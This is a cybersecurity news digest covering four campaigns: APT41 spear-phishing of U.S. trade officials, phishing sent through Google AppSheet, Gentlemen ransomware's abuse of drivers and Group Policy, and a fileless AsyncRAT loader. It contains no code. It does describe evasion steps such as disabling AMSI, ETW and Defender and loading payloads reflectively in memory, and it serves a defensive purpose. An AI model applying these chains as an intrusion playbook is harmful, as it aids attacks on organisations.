China-Linked APT41 Hackers Target U.S. Trade Officials Amid 2025 Negotiations
The House Select Committee on China has issued a formal advisory warning of an ongoing cyber espionage campaign attributed to the China-linked threat group APT41, surfacing during a period of heightened U.S.–China trade negotiations. Investigators confirmed that the attacks targeted U.S. government agencies, trade associations, D.C. law firms, think tanks, and at least one foreign government, with the goal of collecting intelligence to shape policy outcomes. Threat actors impersonated Congressman John Robert Moolenaar (R-MI) in spear-phishing emails that attached malware-laden draft legislation and urged recipients to provide immediate feedback on sanctions against China. Once opened, the files deployed malware that enabled persistent access, credential harvesting, and stealthy exfiltration of sensitive data while abusing cloud services to mask traffic. The committee noted that attribution to APT41 is consistent with the group’s long history of state-backed operations against political, economic, and technology sectors worldwide. Analysts emphasize that the campaign demonstrates both tactical sophistication and a clear strategic alignment with the CCP's foreign policy priorities. This incident closely mirrors a January 2025 spear-phishing campaign targeting committee staffers, in which adversaries posed as representatives of ZPMC, a Chinese state-owned crane manufacturer, and attempted to steal Microsoft 365 credentials through fraudulent file-sharing notifications. The repetition of tailored lures highlights APT41’s persistence and adaptability, leveraging both industry-themed and political narratives to maximize credibility and bypass defensive measures. Experts warn that attackers are increasingly exploiting personal or non-official accounts of high-value individuals, knowing that such channels often fall outside enterprise monitoring, and then pivot into sensitive networks once trust is established. The advisory concludes that the timing, methods, and infrastructure align with CCP state-directed cyber-espionage, which aims to manipulate U.S. policy deliberations and gain leverage in trade talks. To mitigate these threats, organizations tied to trade and policy should deploy phishing-resistant MFA, strengthen detection of anomalous cloud activity, and require multi-channel verification for politically sensitive requests before taking action.
Hackers Impersonate Google AppSheet in Latest Phishing Campaign
A newly uncovered phishing campaign is abusing Google’s AppSheet platform to deliver credential-harvesting emails that evade traditional defenses. AppSheet, integrated tightly with Google Workspace, is widely used for workflow automation and routinely sends legitimate notifications for access requests, data syncs, and system updates. Attackers are exploiting this inherent trust by embedding malicious links into AppSheet templates and distributing them via AppSheet’s own email infrastructure, which reliably passes SPF, DKIM, and DMARC checks. Abuse scenarios include hijacking compromised AppSheet accounts, creating new accounts solely to distribute phishing messages at scale, and injecting rogue URLs into user-generated templates. Because the messages originate from a legitimate Google domain, recipients perceive them as authentic, making the campaign especially effective in corporate environments where AppSheet messages are routine and seldom questioned. Detection in this case required context- and behavior-driven analysis rather than sender validation. Raven AI identified anomalies, including shortened redirector URLs, subject lines referencing legal compliance, and content mismatches between typical AppSheet notifications and the phishing lure. It also identified correlated patterns across polymorphic templates, detecting subtle shifts in wording while maintaining the same underlying objective of credential theft. To mitigate exposure, security teams should deploy behavioral email analysis capable of flagging contextually inconsistent messages, closely monitor AppSheet account activity for unauthorized template changes, and block suspicious shortener domains at the proxy level. Organizations should also conduct targeted awareness training, reminding users that even communications from well-known Google domains can be weaponized, and that unexpected requests for credential input must always be verified before taking any action.
Gentlemen Ransomware Exploits Drivers and Group Policies to Breach Organizations
The newly emerged Gentlemen ransomware group has quickly established itself as a sophisticated and highly adaptive threat actor, conducting coordinated campaigns across at least 17 countries. First observed in August 2025, the group has demonstrated advanced capabilities by abusing legitimate signed drivers for kernel-level manipulation, leveraging Group Policy Objects (GPOs) for domain-wide compromise, and deploying custom anti-AV utilities specifically tailored to the targeted environment. Researchers have identified attacks targeting the manufacturing, construction, healthcare, and insurance sectors, with a concentration in the U.S. and Thailand. The group’s operational security practices—encrypted exfiltration via WinSCP, redundant persistence with AnyDesk, and registry modifications—underscore its methodical approach. Evidence also suggests that FortiGate administrative accounts have been compromised, providing the attackers with deep visibility into network traffic and serving as a potential entry point for lateral movement. The campaign employs a multi-stage methodology, starting with reconnaissance of Active Directory and security software configurations, followed by privilege escalation and the exploitation of legitimate tools, including PsExec, for lateral movement. After disabling Windows Defender through PowerShell commands and altering firewall rules, the actors distributed a password-protected ransomware payload via NETLOGON shares to achieve maximum domain impact. Their use of double extortion tactics—data theft combined with system encryption—further amplifies risk to critical infrastructure. This campaign illustrates the evolution of ransomware into highly tailored, enterprise-aware operations that blend living-off-the-land techniques with custom malware. Organizations are advised to strengthen defenses by monitoring for anomalous GPO changes, signed driver exploitation, and unauthorized administrative activity; enforcing strict segmentation; and preparing incident response plans.
Update: AsyncRAT Leverages Fileless Techniques to Bypass Detection
Researchers have discovered a new campaign that highlights how threat actors are increasingly turning to fileless malware to evade detection, leveraging in-memory execution and trusted administrative tools to deploy AsyncRAT. The attack chain began when adversaries exploited a compromised ScreenConnect client, thereby gaining remote access to the target system. From there, attackers executed Update.vbs via WScript, which used PowerShell to fetch payloads (logs[.]ldk and logs[.]ldr) into C:\Users\Public\ and then convert them into byte arrays loaded directly into memory via reflection. The first-stage loader, Obfuscator[.]dll, operated entirely in memory, establishing persistence by creating a scheduled task masked as “Skype Updater,” while also disabling AMSI and ETW to prevent script logging and detection. By dynamically resolving API calls and removing forensic traces, the loader ensured that subsequent payloads could execute without leaving noticeable artifacts on disk. With defenses neutralized, the second stage introduced AsyncClient[.]exe, decrypted from Base64-encoded and AES-256 encrypted configuration data, which revealed persistence flags, target directories, and unique hardware IDs. The RAT then established a TCP-based heartbeat, using MessagePack packets to exchange commands and exfiltrated data. AsyncRAT performed host reconnaissance, harvesting system information, antivirus status, active windows, and browser extensions while exfiltrating clipboard contents, keystrokes, credentials, and cookies. Captured data was encrypted and uploaded to the C2, while persistence mechanisms were rebuilt if they had been disabled. The use of reflective loading, memory-only assemblies, and dual-scheduled tasks made this campaign highly resilient, emphasizing how fileless loaders weaponize normal tools to bypass AV/EDR controls. Security teams must adopt memory forensics, enforce strict policies for remote management utilities, monitor anomalous PowerShell and WScript activity, and require MFA for administrative access to disrupt these increasingly stealthy intrusions.
